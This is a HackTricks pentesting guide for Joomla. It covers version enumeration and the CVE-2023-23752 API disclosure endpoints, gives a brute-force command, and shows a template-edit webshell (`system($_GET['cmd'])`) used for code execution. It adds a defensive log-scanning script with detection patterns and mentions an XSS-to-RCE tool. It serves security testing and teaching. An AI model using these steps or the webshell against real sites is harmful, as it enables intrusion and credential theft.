	Joomla
{% hint style="success" %}
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
{% endhint %}
Joomla Statistics
Joomla collects some anonymous usage statistics such as the breakdown of Joomla, PHP and database versions and server operating systems in use on Joomla installations. This data can be queried via their public API.
curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool
{
    "data": {
        "cms_version": {
            "3.0": 0,
            "3.1": 0,
            "3.10": 6.33,
            "3.2": 0.01,
            "3.3": 0.02,
            "3.4": 0.05,
            "3.5": 12.24,
            "3.6": 22.85,
            "3.7": 7.99,
            "3.8": 17.72,
            "3.9": 27.24,
            "4.0": 3.21,
            "4.1": 1.53,
            "4.2": 0.82,
            "4.3": 0,
            "5.0": 0
        },
        "total": 2951032
    }
}
Enumeration
Discovery/Footprinting
- Check the meta
curl https://www.joomla.org/ | grep Joomla | grep generator
<meta name="generator" content="Joomla! - Open Source Content Management" />
- robots.txt
# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
[...]
- README.txt
1- What is this?
	* This is a Joomla! installation/upgrade package to version 3.x
	* Joomla! Official site: https://www.joomla.org
	* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
	* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging
Version
- In /administrator/manifests/files/joomla.xml you can see the version.
- In /language/en-GB/en-GB.xml you can get the version of Joomla.
- In plugins/system/cache/cache.xml you can see an approximate version.
Automatic
droopescan scan joomla --url http://joomla-site.local/
The 80,443 - Pentesting Web Methodology page has a section about CMS scanners that can also scan Joomla.
API Unauthenticated Information Disclosure:
Versions from 4.0.0 to 4.2.7 are vulnerable to an unauthenticated information disclosure (CVE-2023-23752) that dumps credentials and other information through the web services API:
- Users: http://<host>/api/v1/users?public=true
- Config file: http://<host>/api/index.php/v1/config/application?public=true
MSF module: scanner/http/joomla_api_improper_access_checks, or the ruby script: 51334
Brute-Force
You can use this script to attempt to brute force the login.
sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin
 
admin:admin
RCE
If you have admin credentials you can gain RCE by adding a snippet of PHP code to a template. This can be done from the template customisation page:
- Click on Templates on the bottom left under Configuration to pull up the templates menu.
- Click on a template name. Let's choose protostar under the Template column header. This will bring us to the Templates: Customise page.
- Finally, click on a page to pull up its source. Let's choose the error.php page. Add a PHP one-liner to gain code execution as follows: system($_GET['cmd']);
- Save & Close
- curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
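From the defender's side, both the CVE-2023-23752 API disclosure above and the error.php template edit leave a recognisable trace in the web server access log. The following is an added example, not code from HackTricks or from any tool referenced on this page: it parses Apache combined-format log lines (constructed samples with made-up IPs) and tags requests that hit the `public=true` API endpoints or call a PHP file under `/templates/` with a `cmd` parameter.

```python
import re

# Constructed Apache combined-format access-log lines (IPs, timestamps and sizes are made up).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:12:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:12:00:02 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 1840 "-" "curl/8.4.0"
203.0.113.7 - - [10/Mar/2024:12:00:03 +0000] "GET /api/v1/users?public=true HTTP/1.1" 200 930 "-" "curl/8.4.0"
198.51.100.9 - - [10/Mar/2024:12:05:10 +0000] "GET /templates/protostar/error.php?cmd=id HTTP/1.1" 200 60 "-" "curl/8.4.0"
198.51.100.9 - - [10/Mar/2024:12:05:11 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 403 199 "-" "curl/8.4.0"
203.0.113.7 - - [10/Mar/2024:12:06:00 +0000] "GET /templates/protostar/css/template.css HTTP/1.1" 200 12000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# CVE-2023-23752: the two endpoints listed on the page, with or without the index.php prefix,
# combined with the public=true parameter that bypasses the access check on 4.0.0-4.2.7.
API_LEAK_RE = re.compile(
    r'^/api/(?:index\.php/)?v1/(?:config/application|users)\?(?:.*&)?public=true(?:&|$)'
)
# A PHP file under /templates/ called with a cmd parameter: the error.php one-liner pattern.
TEMPLATE_SHELL_RE = re.compile(r'^/templates/[^/]+/[^?]+\.php\?(?:.*&)?cmd=')


def classify(path: str, status: int):
    """Return a finding tag for one request, or None if it looks benign."""
    if API_LEAK_RE.match(path):
        # A 200 means the server actually returned the object; anything else is only a probe.
        return "cve-2023-23752-disclosure" if status == 200 else "cve-2023-23752-probe"
    if TEMPLATE_SHELL_RE.match(path):
        return "template-webshell-command"
    return None


def scan_log(text: str):
    """Return (client_ip, path, tag) for every suspicious line in an access log."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        tag = classify(m["path"], int(m["status"]))
        if tag:
            findings.append((m["ip"], m["path"], tag))
    return findings
```

Run `scan_log(SAMPLE_LOG)` to get four findings: two successful disclosures, one webshell command and one probe that was denied with a 403. The distinction between a 200 and any other status is what tells you whether data actually left the server.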
From XSS to RCE
- JoomSploit: a Joomla exploitation script that elevates XSS to RCE or other critical vulnerabilities. For more info check this post. It supports Joomla versions 5.X.X, 4.X.X and 3.X.X, and allows you to:
  - Privilege Escalation: create a user in Joomla.
  - (RCE) Built-In Templates Edit: edit a built-in template in Joomla.
  - (Custom) Custom Exploits: custom exploits for third-party Joomla plugins.